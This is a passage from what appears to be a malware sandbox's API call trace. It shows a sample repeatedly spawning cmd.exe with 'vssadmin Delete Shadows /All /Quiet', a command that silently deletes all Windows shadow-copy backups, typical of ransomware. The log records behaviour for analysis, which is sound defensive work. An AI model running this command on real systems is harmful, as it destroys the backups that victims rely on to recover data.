lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.373] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.373] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.373] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.373] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.373] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.373] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.373] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.373] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.373] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.373] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.374] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.374] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.374] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.374] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.374] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.374] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.374] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.374] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.374] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.374] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.374] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.374] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.375] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.375] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.375] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.375] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.376] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.376] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.376] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.376] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.377] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.377] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.377] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.377] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.377] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.377] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.377] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.377] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.377] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.377] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.377] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.377] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.377] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.378] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.378] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.378] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.378] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.378] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.378] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.378] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.378] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.378] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.378] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.378] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.379] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.379] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, 